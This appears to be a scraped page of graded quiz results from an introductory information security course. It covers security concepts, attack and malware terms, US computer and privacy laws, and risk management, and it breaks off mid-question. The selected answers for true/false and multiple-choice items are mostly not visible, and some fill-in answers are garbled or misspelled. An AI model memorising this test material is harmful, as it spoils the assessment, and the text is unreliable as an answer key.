Question1Marks: 2 Show Information security can begin as a grassroots effort in which systems administrators attempt to improve the security of their systems, which is often referred to as a bottom-up approach. Answer: True False Correct Marks for this submission: 2/2. Question2Marks: 2 Confidentiality ensures that only those with the rights and privileges to access information are able to do so. Answer: True False Correct Marks for this submission: 2/2. Question3Marks: 2 A(n) project team should consist of a number of individuals who are experienced in one or multiple facets of the technical and nontechnical areas. Answer: True False Correct Marks for this submission: 2/2. Question4Marks: 2 Part of the logical design phase of the SecSDLC is planning for partial or catastrophic loss. ____ dictates what steps are taken when an attack occurs. Choose one answer.a. Continuity planning b. Incident response c. Disaster recovery d. Security response Correct Marks for this submission: 2/2. Question5Marks: 2 A data custodian works directly with data owners and is responsible for the storage, maintenance, and protection of the information. Answer: True False Correct Marks for this submission: 2/2. Question6Marks: 2 A famous study entitled Protection Analysis: Final Report was published in ____. Choose one answer.a. 1868 b. 1978 c. 1988 d. 1998 Correct Marks for this submission: 2/2. Question7Marks: 2 During the early years, information security was a straightforward process composed predominantly of ____________________ security and simple document classification schemes. Answer: physical Correct Marks for this submission: 2/2. Question8Marks: 2 In an organization, the value of ____________________ of information is especially high when it involves personal information about employees, customers, or patients. Answer:confidentiality Correct Marks for this submission: 2/2. Question9Marks: 2 During the ____________________ War, many mainframes were brought online to accomplish more complex and sophisticated tasks so it became necessary to enable the mainframes to communicate via a less cumbersome process than mailing magnetic tapes between computer centers. Answer:Cold Correct Marks for this submission: 2/2. Question10Marks: 2 In the ____________________ approach, the project is initiated by upper-level managers who issue policy, procedures and processes, dictate the goals and expected outcomes, and determine accountability for each required action. Answer:top-dow n Correct Marks for this submission: 2/2. Question11Marks: 2 A(n) ____________________ is a formal approach to solving a problem by means of a structured sequence of procedures. Answer:methodology Correct Marks for this submission: 2/2. Question12Marks: 2 The ____ is the individual primarily responsible for the assessment, management, and implementation of information security in the organization. Choose one answer.a. ISO b. CIO c. CISO d. CTO Correct Marks for this submission: 2/2. Question13Marks: 2 The senior technology officer is typically the chief ____________________ officer. Answer:information Correct Marks for this submission: 2/2. Question14Marks: 2 The ____ model consists of six general phases. Choose one answer.a. pitfall b. 5SA&D c. waterfall d. SysSP Correct Marks for this submission: 2/2. Question15Marks: 2 The ____________________ phase consists primarily of assessments of the organization, its current systems, and its capability to support the proposed systems. Answer:analysis Correct Marks for this submission: 2/2. Question16Marks: 2 ____ of information is the quality or state of being genuine or original. Choose one answer.a. Authenticity b. Spoofing c. Confidentiality d. Authorization Correct Marks for this submission: 2/2. Question17Marks: 2 Information has ____________________ when it is whole, complete, and uncorrupted. Answer:integrity Correct Marks for this submission: 2/2. Question18Marks: 2 The CNSS model of information security evolved from a concept developed by the computer security industry known as the ____________________ triangle. Answer:C.I.A. Correct Marks for this submission: 2/2. Question19Marks: 2 Policies are written instructions for accomplishing a specific task. Answer: True False Correct Marks for this submission: 2/2. Question20Marks: 2 An information system is the entire set of ____, people, procedures, and networks that make possible the use of information resources in the organization. Choose one answer.a. software b. hardware c. data d. All of the above Correct Marks for this submission: 2/2. Question21Marks: 2 People with the primary responsibility for administering the systems that house the information used by the organization perform the ____ role. Choose one answer.a. security policy developers b. security professionals c. system administrators d. end users Correct Marks for this submission: 2/2. Question22Marks: 2 A champion is a project manager, who may be a departmental line manager or staff unit manager, and understands project management, personnel management, and information security technical requirements. Answer: True False Correct Marks for this submission: 2/2. Question23Marks: 2 A(n) ____ attack is a hacker using a personal computer to break into a system. Choose one answer.a. indirect b. direct c. software d. hardware Correct Marks for this submission: 2/2. Question24Marks: 2 ____ is the predecessor to the Internet. Choose one answer.a. NIST b. ARPANET c. FIPS d. DES Correct Marks for this submission: 2/2. Question25Marks: 2 Hardware is often the most valuable asset possessed by an organization and it is the main target of intentional attacks. Answer: True False Correct Marks for this submission: 2/2. Question26Marks: 2 In file hashing, a file is read by a special algorithm that uses the value of the bits in the file to compute a single large number called a ____ value. Choose one answer.a. key b. hashing c. hash d. code Correct Marks for this submission: 2/2. Question27Marks: 2 Applications systems developed within the framework of the traditional SDLC are designed to anticipate a software attack that requires some degree of application reconstruction. Answer: True False Correct Marks for this submission: 2/2. Question28Marks: 2 A(n) ____________________ is a group of individuals who are united by similar interests or values within an organization and who share a common goal of helping the organization to meet its objectives. Answer:community of interest Correct Marks for this submission: 2/2. Question29Marks: 2 The ____ is a methodology for the design and implementation of an information system in an organization. Choose one answer.a. DSLC b. SDLC c. LCSD d. CLSD Correct Marks for this submission: 2/2. Question30Marks: 2 Hardware is the physical technology that houses and executes the software, stores and transports the data, and provides interfaces for the entry and removal of information from the system. Answer: True False Correct Marks for this submission: 2/2. Question31Marks: 2 A frequently overlooked component of an IS, ____________________ are written instructions for accomplishing a specific task. Answer:procedures Correct Marks for this submission: 2/2. Question32Marks: 2 Organizations are moving toward more ____-focused development approaches, seeking to improve not only the functionality of the systems they have in place, but consumer confidence in their product. Choose one answer.a. security b. reliability c. accessibility d. availability Correct Marks for this submission: 2/2. Question33Marks: 2 Information security can be an absolute. Answer: True False Correct Marks for this submission: 2/2. Question34Marks: 2 A breach of possession always results in a breach of confidentiality. Answer: True False Correct Marks for this submission: 2/2. Question35Marks: 2 The Internet brought connectivity to virtually all computers that could reach a phone line or an Internetconnected local area ____________________. Answer:netw ork Correct Marks for this submission: 2/2. Question36Marks: 2 An e-mail virus involves sending an e-mail message with a modified field. Answer: True False Correct Marks for this submission: 2/2. Question37Marks: 2 In information security, salami theft occurs when an employee steals a few pieces of information at a time, knowing that taking more would be noticed but eventually the employee gets something complete or useable. Answer: True False Correct Marks for this submission: 2/2. Question38 Marks: 2 Information has redundancy when it is free from mistakes or errors and it has the value that the end user expects. Answer: True False Correct Marks for this submission: 2/2. Question39Marks: 2 Which of the following is a valid type of data ownership? Choose one answer.a. Data owners b. Data custodians c. Data users d. All of the above Correct Marks for this submission: 2/2. Question40Marks: 2 Which of the following phases is the longest and most expensive phase of the systems development life cycle? Choose one answer.a. investigation b. logical design c. implementation d. maintenance and change Correct Marks for this submission: 2/2. Question41Marks: 2 The most successful kind of top-down approach involves a formal development strategy referred to as a ____. Choose one answer.a. systems design b. development life project c. systems development life cycle d. systems schema Correct Marks for this submission: 2/2. Question42Marks: 2 Direct attacks originate from a compromised system or resource that is malfunctioning or working under the control of a threat. Answer: True False Correct Marks for this submission: 2/2. Question43Marks: 2 In general, protection is the quality or state of being secureto be free from danger. Answer: True False Correct Marks for this submission: 2/2. Question44Marks: 2 A computer is the ____________________ of an attack when it is the target entity. Answer:object Correct Marks for this submission: 2/2. Question45Marks: 2 A computer is the ____ of an attack when it is used to conduct the attack. Choose one answer.a. subject b. object c. target d. facilitator Correct Marks for this submission: 2/2. Question46Marks: 2 During the ____ phase, specific technologies are selected to support the alternatives identified and evaluated in the logical design. Choose one answer.a. investigation b. implementation c. analysis d. physical design Correct Marks for this submission: 2/2. Question47Marks: 2 The ____________________ component of the IS comprises applications, operating systems, and assorted command utilities. Answer:softw are Correct Marks for this submission: 2/2. Question48Marks: 2 The ____________________ of information is the quality or state of ownership or control of some object or item. Answer:possession Correct Marks for this submission: 2/2. Question49Marks: 2 A(n) ____________________ information security policy outlines the implementation of a security program within the organization. Answer:enterprise information security policy Incorrect Correct answer: enterprise Marks for this submission: 0/2. Question50Marks: 2 The history of information security begins with the history of ____________________ security. Answer:computer Correct Marks for this submission: 2/2. Question1Marks: 2 Attempting to reverse-calculate a password is called ____________________. Answer:cracking Correct Marks for this submission: 2/2. Question2Marks: 2 In the well-known ____ attack, an attacker monitors (or sniffs) packets from the network, modifies them, and inserts them back into the network. Choose one answer.a. zombie-in-the-middle b. sniff-in-the-middle c. server-in-the-middle d. man-in-the-middle Correct Marks for this submission: 2/2. Question3Marks: 2 A ____ is an attack in which a coordinated stream of requests is launched against a target from many locations at the same time. Choose one answer.a. denial-of-service b. distributed denial-of-service c. virus d. spam Correct Marks for this submission: 2/2. Question4Marks: 2 In a ____ attack, the attacker sends a large number of connection or information requests to a target. Choose one answer.a. denial-of-service b. distributed denial-of-service c. virus d. spam Correct Marks for this submission: 2/2. Question5Marks: 2 Intellectual property is defined as the ownership of ideas and control over the tangible or virtual representation of those ideas. Answer: True False Correct Marks for this submission: 2/2. Question6Marks: 2 Complete loss of power for a moment is known as a ____. Choose one answer.a. sag b. fault c. brownout d. blackout Incorrect Marks for this submission: 0/2. Question7Marks: 2 Microsoft acknowledged that if you type a res:// URL (a Microsoft-devised type of URL) which is longer than ____ characters in Internet Explorer 4.0, the browser will crash. Choose one answer.a. 64 b. 128 c. 256 d. 512 Correct Marks for this submission: 2/2. Question8Marks: 2 Duplication of software-based intellectual property is more commonly known as software ____________________. Answer:piracy Correct Marks for this submission: 2/2. Question9Marks: 2 A(n) ____________________ is an object, person, or other entity that represents an ongoing danger to an asset. Answer:threat Correct Marks for this submission: 2/2. Question10Marks: 2 The ____ data file contains the hashed representation of the users password. Choose one answer.a. SLA b. SNMP c. FBI d. SAM Correct Marks for this submission: 2/2. Question11Marks: 2 Web hosting services are usually arranged with an agreement providing minimum service levels known as a(n) ____. Choose one answer.a. SSL b. SLA c. MSL d. MIN Correct Marks for this submission: 2/2. Question12Marks: 2 ____ are software programs that hide their true nature, and reveal their designed behavior only when activated. Choose one answer. a. Viruses b. Worms c. Spam d. Trojan horses Correct Marks for this submission: 2/2. Question13Marks: 2 In the context of information security, ____________________ is the process of using social skills to convince people to reveal access credentials or other valuable information to the attacker. Answer:social engineering Correct Marks for this submission: 2/2. Question14Marks: 2 A firewall is a mechanism that keeps certain kinds of network traffic out of a private network. Answer: True False Correct Marks for this submission: 2/2. Question15Marks: 2 A(n) ____________________ is a malicious program that replicates itself constantly, without requiring another program environment. Answer:w orm Correct Marks for this submission: 2/2. Question16 Marks: 2 ESD means electrostatic ____________________. Answer:discharge Correct Marks for this submission: 2/2. Question17Marks: 2 A number of technical mechanismsdigital watermarks and embedded code, copyright codes, and even the intentional placement of bad sectors on software mediahave been used to enforce copyright laws. Answer: True False Correct Marks for this submission: 2/2. Question18Marks: 2 Compared to Web site defacement, vandalism within a network is less malicious in intent and more public. Answer: True False Correct Marks for this submission: 2/2. Question19Marks: 2 As frustrating as viruses and worms are, perhaps more time and money is spent on resolving virus ____. Choose one answer.a. false alarms b. power faults c. hoaxes d. urban legends Correct Marks for this submission: 2/2. Question20Marks: 2 A(n) cookie can allow an attacker to collect information on how to access password-protected sites. Answer: True False Correct Marks for this submission: 2/2. Question21Marks: 2 One form of online vandalism is ____ operations, which interfere with or disrupt systems to protest the operations, policies, or actions of an organization or government agency. Choose one answer.a. hacktivist b. phvist c. hackcyber d. cyberhack Correct Marks for this submission: 2/2. Question22Marks: 2 An act of theft performed by a hacker falls into the category of theft, but is also often accompanied by defacement actions to delay discovery and thus may also be placed within the category of forces of nature. Answer: True False Correct Marks for this submission: 2/2. Question23 Marks: 2 Acts of ____ can lead to unauthorized real or virtual actions that enable information gatherers to enter premises or systems they have not been authorized to enter. Choose one answer.a. bypass b. nature c. trespass d. security Correct Marks for this submission: 2/2. Question24Marks: 2 A computer virus consists of segments of code that perform ____________________ actions. Answer:malicious Correct Marks for this submission: 2/2. Question25Marks: 2 A momentary low voltage is called a(n) ____________________. Answer:sag Correct Marks for this submission: 2/2. Question26Marks: 2 A mail bomb is a form of DoS. Answer: True False Correct Marks for this submission: 2/2. Question27Marks: 2 Which of the following functions does information security perform for an organization? Choose one answer.a. Protecting the organizations ability to function. b. Enabling the safe operation of applications implemented on the organizations IT systems. c. Protecting the data the organization collects and uses. d. All of the above. Correct Marks for this submission: 2/2. Question28Marks: 2 Some information gathering techniques are quite legal, for example, using a Web browser to perform market research. These legal techniques are called, collectively, competitive ____________________. Answer:itelligence Incorrect Correct answer: intelligence Marks for this submission: 0/2. Question29Marks: 2 A worm requires that another program is running before it can begin functioning. Answer: True False Correct Marks for this submission: 2/2. Question30Marks: 2 Which of the following is an example of a Trojan horse program? Choose one answer.a. Netsky b. MyDoom c. Klez d. Happy99.exe Correct Marks for this submission: 2/2. Question31Marks: 2 Cyberterrorists hack systems to conduct terrorist activities via network or Internet pathways. Answer: True False Correct Marks for this submission: 2/2. Question32Marks: 2 A(n) ____________________ is an application error that occurs when more data is sent to a program buffer than it is designed to handle. Answer:buffer overrun Correct Marks for this submission: 2/2. Question33Marks: 2 A virus or worm can have a payload that installs a(n) ____________________ door or trap door component in a system, which allows the attacker to access the system at will with special privileges. Answer:back Correct Marks for this submission: 2/2. Question34Marks: 2 ____ are machines that are directed remotely (usually by a transmitted command) by the attacker to participate in an attack. Choose one answer.a. Drones b. Helpers c. Zombies d. Servants Correct Marks for this submission: 2/2. Question35Marks: 2 Script ____________________ are hackers of limited skill who use expertly written software to attack a system. Answer:kiddies Correct Marks for this submission: 2/2. Question36Marks: 2 The expert hacker sometimes is called ____________________ hacker. Answer:elite Correct Marks for this submission: 2/2. Question37Marks: 2 A(n) ____________________ hacks the public telephone network to make free calls or disrupt services. Answer:phreaker Correct Marks for this submission: 2/2. Question38Marks: 2 DoS attacks cannot be launched against routers. Answer: True False Correct Marks for this submission: 2/2. Question39Marks: 2 There are generally two skill levels among hackers: expert and ____. Choose one answer.a. novice b. journeyman c. packet monkey d. professional Correct Marks for this submission: 2/2. Question40Marks: 2 The ____ hijacking attack uses IP spoofing to enable an attacker to impersonate another entity on the network. Choose one answer.a. WWW b. TCP c. FTP d. HTTP Correct Marks for this submission: 2/2. Question41Marks: 2 Hackers are people who use and create computer software to gain access to information illegally. Answer: True False Correct Marks for this submission: 2/2. Question42Marks: 2 A(n) polymorphic threat is one that over time changes the way it appears to antivirus software programs, making it undetectable by techniques that look for preconfigured signatures. Answer: True False Correct Marks for this submission: 2/2. Question43Marks: 2 Attacks conducted by scripts are usually unpredictable. Answer: True False Incorrect Marks for this submission: 0/2. Question44Marks: 2 According to Mark Pollitt, ____ is the premeditated, politically motivated attacks against information, computer systems, computer programs, and data which result in violence against noncombatant targets by subnational groups or clandestine agents. Choose one answer.a. infoterrorism b. cyberterrorism c. hacking d. cracking Correct Marks for this submission: 2/2. Question45Marks: 2 A(n) ____________________ is an identified weakness in a controlled system, where controls are not present or are no longer effective. Answer:vulnerability Correct Marks for this submission: 2/2. Question46Marks: 2 A timing attack involves the interception of cryptographic elements to determine keys and encryption algorithms. Answer: True False Correct Marks for this submission: 2/2. Question47Marks: 2 A worm can deposit copies of itself onto all Web servers that the infected system can reach, so that users who subsequently visit those sites become infected. Answer: True False Correct Marks for this submission: 2/2. Question48Marks: 2 The timing attackexplores the contents of a Web browsers ____________________. Answer:cache Correct Marks for this submission: 2/2. Question49Marks: 2 A sniffer program shows all the data going by on a network segment including passwords, the data inside filessuch as word-processing documentsand screens full of sensitive data from applications. Answer: True False Correct Marks for this submission: 2/2. Question50Marks: 2 A(n) ____________________ is an act that takes advantage of a vulnerability to compromise a controlled system. Answer:attack Correct Marks for this submission: 2/2. Question1Marks: 2 The ____________________ is a respected professional society that was established in 1947 as the worlds first educational and scientific computing society. Answer: Association of Computing Machinery Correct Marks for this submission: 2/2. Question2Marks: 2 Laws and policies and their associated penalties only deter if which of the following conditions is present? Choose one answer.a. Fear of penalty b. Probability of being caught c. Probability of penalty being administered d. All of the above Correct Marks for this submission: 2/2. Question3Marks: 2 Cultural differences can make it easy to determine what is and is not ethicalespecially when it comes to the use of computers. Answer: True False Correct Marks for this submission: 2/2. Question4Marks: 2 The ____________________ Act of 2001 provides law enforcement agencies with broader latitude in order to combat terrorism-related activities. Answer:USA PATRIOT Correct Marks for this submission: 2/2. Question5Marks: 2 Which of the following countries reported generally intolerant attitudes toward personal use of organizational computing resources? Choose one answer.a. Australia b. United States c. Singapore d. Sweden Correct Marks for this submission: 2/2. Question6Marks: 2 ____ attempts to prevent trade secrets from being illegally shared. Choose one answer.a. Electronic Communications Privacy Act b. Sarbanes-Oxley Act c. Financial Services Modernization Act d. Economic Espionage Act Correct Marks for this submission: 2/2. Question7Marks: 2 The Privacy of Customer Information Section of the common carrier regulation states that any proprietary information shall be used explicitly for providing services, and not for any ____ purposes. Choose one answer.a. troubleshooting b. billing c. customer service d. marketing Correct Marks for this submission: 2/2. Question8Marks: 2 Established in January 2001, the National InfraGard Program began as a cooperative effort between the FBIs Cleveland Field Office and local technology professionals. Answer: True False Correct Marks for this submission: 2/2. Question9Marks: 2 The ____ Portability and Accountability Act Of 1996, also known as the Kennedy-Kassebaum Act, protects the confidentiality and security of health care data by establishing and enforcing standards and by standardizing electronic data interchange. Choose one answer.a. Customer b. Health Insurance c. Computer d. Telecommunications Correct Marks for this submission: 2/2. Question10Marks: 2 Studies have reported that the Pacific Rim countries of Singapore and Hong Kong are hotbeds of software piracy. Answer: True False Correct Marks for this submission: 2/2. Question11Marks: 2 ____________________ are the fixed moral attitudes or customs of a particular group. Answer:Cultural mores Correct Marks for this submission: 2/2. Question12Marks: 2 Every state has implemented uniform laws and regulations placed on organizational use of computer technology. Answer: True False Correct Marks for this submission: 2/2. Question13Marks: 2 HIPAA specifies particular security technologies for each of the security requirements to ensure the privacy of the health-care information. Answer: True False Correct Marks for this submission: 2/2. Question14Marks: 2 The ____________________ Association is a professional association that focuses on auditing, control, and security and whose membership comprises both technical and managerial professionals. Answer:Information Systems Audit and Control Correct Marks for this submission: 2/2. Question15Marks: 2 The ____________________ Act of 1996 attempts to prevent trade secrets from being illegally shared. Answer:Economic Espionage Correct Marks for this submission: 2/2. Question16Marks: 2 The ____________________ Act of 1986 is a collection of statutes that regulates the interception of wire, electronic, and oral communications. Answer:Electronic Communications Privacy Correct Marks for this submission: 2/2. Question17Marks: 2 Which of the following acts is also widely known as the Gramm-Leach-Bliley Act? Choose one answer.a. Financial Services Modernization Act b. Communications Act c. Computer Security Act d. Economic Espionage Act Correct Marks for this submission: 2/2. Question18Marks: 2 What is the subject of the Computer Security Act? Choose one answer.a. Federal Agency Information Security b. Telecommunications Common Carriers c. Cryptography Software Vendors d. Banking Industry Correct Marks for this submission: 2/2. Question19Marks: 2 Software license infringement is also often called software ____________________. Answer:piracy Correct Marks for this submission: 2/2. Question20Marks: 2 Civil law addresses activities and conduct harmful to society and is actively enforced by the state. Answer: True False Correct Marks for this submission: 2/2. Question21Marks: 2 Intellectual privacy is recognized as a protected asset in the United States. Answer: True False Incorrect Marks for this submission: 0/2. Question22Marks: 2 What is the subject of the Sarbanes-Oxley Act? Choose one answer.a. Banking b. Financial Reporting c. Privacy d. Trade secrets Correct Marks for this submission: 2/2. Question23Marks: 2 Key studies reveal that the overriding factor in leveling the ethical perceptions within a small population is ____________________. Answer:education Correct Marks for this submission: 2/2. Question24Marks: 2 Deterrence can prevent an illegal or unethical activity from occurring. Answer: True False Correct Marks for this submission: 2/2. Question25Marks: 2 The ____________________ is the American contribution to an international effort to reduce the impact of copyright, trademark, and privacy infringement, especially when accomplished via the removal of technological copyright protection measures. Answer:Digital Millennium Copyright Act Correct Marks for this submission: 2/2. Question26Marks: 2 The Computer ____ and Abuse Act of 1986 is the cornerstone of many computer-related federal laws and enforcement efforts. Choose one answer.a. Violence b. Fraud c. Theft d. Usage Correct Marks for this submission: 2/2. Question27Marks: 2 The Council of Europe adopted the Convention of CyberCrime in ____. Choose one answer.a. 1976 b. 1986 c. 1998 d. 2001 Correct Marks for this submission: 2/2. Question28Marks: 2 The ____________________2 manages a body of knowledge on information security and administers and evaluates examinations for information security certifications. Answer:(ISC) Correct Marks for this submission: 2/2. Question29Marks: 2 In a study on software licence infringement, those from United States were significantly more permissive. Answer: True False Incorrect Marks for this submission: 0/2. Question30Marks: 2 Studies on ethics and computer use reveal that people of different nationalities have different perspectives; difficulties arise when one nationalitys ethical behavior violates the ethics of another national group. Answer: True False Correct Marks for this submission: 2/2. Question31Marks: 2 The ____________________ Act of 1966 allows any person to request access to federal agency records or information not determined to be a matter of national security. Answer:Freedom of Information Correct Marks for this submission: 2/2. Question32Marks: 2 Individuals with authorization and privileges to manage information within the organization are most likely to cause harm or damage ____. Choose one answer.a. with intent b. by accident c. with malice d. with negligence Correct Marks for this submission: 2/2. Question33Marks: 2 Criminal or unethical ____ goes to the state of mind of the individual performing the act. Choose one answer.a. attitude b. intent c. accident d. ignorance Correct Marks for this submission: 2/2. Question34Marks: 2 Which of the following acts defines and formalizes laws to counter threats from computer related acts and offenses? Choose one answer.a. Electronic Communications Privacy Act of 1986 b. Freedom of Information Act (FOIA) c. Computer Fraud and Abuse Act d. Federal Privacy Act of 1974 Correct Marks for this submission: 2/2. Question35Marks: 2 According to the National Information Infrastructure Protection Act of 1996, the severity of the penalty for computer crimes depends on the value of the information obtained and whether the offense is judged to have been committed for each of the following except ____. Choose one answer.a. for purposes of commercial advantage b. for private financial gain c. to harass d. in furtherance of a criminal act Correct Marks for this submission: 2/2. Question36Marks: 2 The National Information Infrastructure Protection Act of 1996 modified which Act? Choose one answer.a. USA PATRIOT Act b. USA PATRIOT Improvement and Reauthorization Act c. Computer Security Act d. Computer Fraud and Abuse Act Correct Marks for this submission: 2/2. Question37Marks: 2 Family law, commercial law, and labor law are all encompassed by ____________________ law. Answer:private Correct Marks for this submission: 2/2. Question38Marks: 2 The ____________________ Act seeks to improve the reliability and accuracy of financial reporting, as well as increase the accountability of corporate governance, in publicly traded companies. Answer:Sarbanes-Oxley Correct Marks for this submission: 2/2. Question39Marks: 2 Which of the following acts is a collection of statutes that regulate the interception of wire, electronic, and oral communications? Choose one answer.a. Electronic Communications Privacy Act b. Financial Services Modernization Ac c. Sarbanes-Oxley Act d. Economic Espionage Act Correct Marks for this submission: 2/2. Question40Marks: 2 The ____________________ Act of 1999 contains a number of provisions focusing on facilitating affiliation among banks, securities firms, and insurance companies. Answer:Financial Services Modernization Correct Marks for this submission: 2/2. Question41Marks: 2 ____________________ are rules that mandate or prohibit certain behavior in society. Answer:Law s Correct Marks for this submission: 2/2. Question42Marks: 2 Due care requires that an organization make a valid effort to protect others and continually maintain this level of effort. Answer: True False Correct Marks for this submission: 2/2. Question43Marks: 2 Ethics define socially acceptable behaviors. Answer: True False Correct Marks for this submission: 2/2. Question44Marks: 2 Individuals with authorization and privileges to manage information within the organization are most likely to cause harm or damage by accident. Answer: True False Correct Marks for this submission: 2/2. Question45Marks: 2 In 1995 the Directive 95/46/EC was adopted by the European Union. Answer: True False Correct Marks for this submission: 2/2. Question46Marks: 2 The low overall degree of tolerance for ____________________ system use may be a function of the easy association between the common crimes of breaking and entering, trespassing, theft, and destruction of property to their computer-related counterparts. Answer:illicit Correct Marks for this submission: 2/2. Question47Marks: 2 The ____ of 1999 provides guidance on the use of encryption and provides protection from government intervention. Choose one answer.a. Sarbanes-Oxley Act b. Gramm-Leach-Bliley Act c. U.S.A. Patriot Act d. Security and Freedom through Encryption Act Correct Marks for this submission: 2/2. Question48Marks: 2 DHS is made up of three directorates. Answer: True False Correct Marks for this submission: 2/2. Question49Marks: 2 Guidelines that describe acceptable and unacceptable employee behaviors in the workplace are known as ____________________. Answer:policies Correct Marks for this submission: 2/2. Question50Marks: 2 Privacy is not absolute freedom from observation, but rather is a more precise state of being free from unsanctioned intrusion. Answer: True False Correct Marks for this submission: 2/2. Question1Marks: 2 A(n) qualitative assessment is based on characteristics that do not use numerical measures. Answer: True False Correct Marks for this submission: 2/2. Question2Marks: 2 A(n) exposure factor is the expected percentage of loss that would occur from a particular attack. Answer: True False Correct Marks for this submission: 2/2. Question3Marks: 2 Management of classified data includes its storage and ____. Choose one answer.a. distribution b. portability c. destruction d. All of the above Correct Marks for this submission: 2/2. Question4Marks: 2 The difference between an organizations measures and those of others is often referred to as a performance ____________________. Answer:gap Correct Marks for this submission: 2/2. Question5 Marks: 2 The ____ strategy attempts to shift risk to other assets, other processes, or other organizations. Choose one answer.a. transfer control b. defend control c. accept control d. mitigate control Correct Marks for this submission: 2/2. Question6Marks: 2 ALE determines whether or not a particular control alternative is worth its cost. Answer: True False Correct Marks for this submission: 2/2. Question7Marks: 2 Operational ____________________ analysis examines user acceptance and support, management acceptance and support, and the overall requirements of the organizations stakeholders. Answer:feasibility Correct Marks for this submission: 2/2. Question8Marks: 2 Cost ____________________ is the process of preventing the financial impact of an incident by implementing a control. Answer: avoidance Correct Marks for this submission: 2/2. Question9Marks: 2 Qualitative-based measures are comparisons based on numerical standards, such as numbers of successful attacks. Answer: True False Correct Marks for this submission: 2/2. Question10Marks: 2 The concept of competitive ____ refers to falling behind the competition. Choose one answer.a. disadvantage b. drawback c. failure d. shortcoming Correct Marks for this submission: 2/2. Question11Marks: 2 Benefit is the value that an organization realizes by using controls to prevent losses associated with a specific vulnerability. Answer: True False Correct Marks for this submission: 2/2. Question12Marks: 2 In the U.S. military classification scheme, ____ data is any information or material the unauthorized disclosure of which reasonably could be expected to cause damage to the national security. Choose one answer.a. confidential b. secret c. top secret d. sensitive Correct Marks for this submission: 2/2. Question13Marks: 2 CBAs cannot be calculated after controls have been functioning for a time. Answer: True False Correct Marks for this submission: 2/2. Question14Marks: 2 The ____ security policy is a planning document that outlines the process of implementing security in the organization. Choose one answer.a. program b. agency c. issue-specific d. system-specific Correct Marks for this submission: 2/2. Question15Marks: 2 The military uses a _____-level classification scheme. Choose one answer.a. three b. four c. five d. six Correct Marks for this submission: 2/2. Question16Marks: 2 Major risk is a combined function of (1) a threat less the effect of threat-reducing safeguards, (2) a vulnerability less the effect of vulnerability reducing safeguards, and (3) an asset less the effect of asset value-reducing safeguards. Answer: True False Correct Marks for this submission: 2/2. Question17Marks: 2 Asset ____________________ is the process of assigning financial value or worth to each information asset. Answer:valuation Correct Marks for this submission: 2/2. Question18 Marks: 2 After identifying and performing the preliminary classification of an organizations information assets, the analysis phase moves on to an examination of the ____________________ facing the organization. Answer:information assets Incorrect Correct answer: threats Marks for this submission: 0/2. Question19Marks: 2 A(n) ____________________ is a value or profile of a performance metric against which changes in the performance metric can be usefully compared. Answer:baseline Correct Marks for this submission: 2/2. Question20Marks: 2 Due ____________________ is the demonstration that the organization is diligent in ensuring that the implemented standards continue to provide the required level of protection. Answer:diligence Correct Marks for this submission: 2/2. Question21Marks: 2 The ____________________ control strategy attempts to reduce the impact caused by the exploitation of vulnerability through planning and preparation. Answer:mitigate Correct Marks for this submission: 2/2. Question22 Marks: 2 Overriding an employees security ____________________ requires that the need-to-know standard be met. Answer:clearance Correct Marks for this submission: 2/2. Question23Marks: 2 Many corporations use a ____ to help secure the confidentiality and integrity of information. Choose one answer.a. system classification scheme b. data restoration scheme c. data hierarchy d. data classification scheme Correct Marks for this submission: 2/2. Question24Marks: 2 Of the three types of mitigation plans, the ____________________ plan is the most strategic and long term. Answer:business continuity Correct Marks for this submission: 2/2. Question25Marks: 2 A best practice proposed for a small home office setting is appropriate to help design control strategies for a multinational company. Answer: True False Correct Marks for this submission: 2/2. Question26Marks: 2 Best business practices are often called recommended practices. Answer: True False Incorrect Marks for this submission: 0/2. Question27Marks: 2 The ____ strategy attempts to prevent the exploitation of the vulnerability. Choose one answer.a. suspend control b. defend control c. transfer control d. defined control Correct Marks for this submission: 2/2. Question28Marks: 2 Risk ____ is the application of controls to reduce the risks to an organizations data and information systems. Choose one answer.a. management b. control c. identification d. security Correct Marks for this submission: 2/2. Question29Marks: 2 A single loss ____________________ is the calculation of the value associated with the most likely loss from an attack. Answer:expentancy Incorrect Correct answer: expectancy Marks for this submission: 0/2. Question30Marks: 2 Security ____________________ are the technical implementations of the policies defined by the organization. Answer:technologies Correct Marks for this submission: 2/2. Question31Marks: 2 Program-specific policies address the specific implementations or applications of which users should be aware. Answer: True False Correct Marks for this submission: 2/2. Question32Marks: 2 The first phase of risk management is ____. Choose one answer.a. risk identification b. design c. risk control d. risk evaluation Correct Marks for this submission: 2/2. Question33Marks: 2 Likelihood risk is the risk to the information asset that remains even after the application of controls. Answer: True False Correct Marks for this submission: 2/2. Question34Marks: 2 For hardware devices, the ____________________ number is used by the network operating system to identify a specific network device. Answer:MAC address Correct Marks for this submission: 2/2. Question35Marks: 2 The actions an organization can and perhaps should take while an incident is in progress should be specified in a document called the ____ plan. Choose one answer.a. BC b. DR c. IR d. BR Correct Marks for this submission: 2/2. Question36Marks: 2 The formal decision making process used when consider the economic feasibility of implementing information security controls and safeguards is called a(n) ____. Choose one answer.a. ARO b. CBA c. ALE d. SLE Correct Marks for this submission: 2/2. Question37Marks: 2 Mutually exclusive means that all information assets must fit in the list somewhere. Answer: True False Correct Marks for this submission: 2/2. Question38Marks: 2 The ____ security policy is an executive-level document that outlines the organizations approach and attitude towards information security and relates the strategic value of information security within the organization. Choose one answer. a. general b. agency c. issue-specific d. system-specific Correct Marks for this submission: 2/2. Question39Marks: 2 A certificate authority should actually be categorized as a software security component. Answer: True False Correct Marks for this submission: 2/2. Question40Marks: 2 Policies are documents that specify an organizations approach to security. Answer: True False Correct Marks for this submission: 2/2. Question41Marks: 2 The ____ strategy is the choice to do nothing to protect a vulnerability and to accept the outcome of its exploitation. Choose one answer.a. avoidance of risk b. transference c. mitigation d. accept control Correct Marks for this submission: 2/2. Question42Marks: 2 In a(n) _____, each information asset is assigned a score for each of a set of assigned critical factor. Choose one answer.a. OPSEC b. COMSEC c. weighted factor analysis d. data classification scheme Correct Marks for this submission: 2/2. Question43Marks: 2 A(n) ____________________ desk policy requires that employees secure all information in appropriate storage containers at the end of each day. Answer:clean Correct Marks for this submission: 2/2. Question44Marks: 2 Behavioral feasibility is also known as ____________________. Answer:operational feasibility Correct Marks for this submission: 2/2. Question45Marks: 2 Once the inventory and value assessment are complete, you can prioritize each asset using a straightforward process known as ____________________ analysis. Answer:w eighted factor Correct Marks for this submission: 2/2. Question46Marks: 2 A(n) disaster recovery plan dictates the actions an organization can and perhaps should take while an incident is in progress. Answer: True False Incorrect Marks for this submission: 0/2. Question47Marks: 2 A(n) ____ is an authorization issued by an organization for the repair, 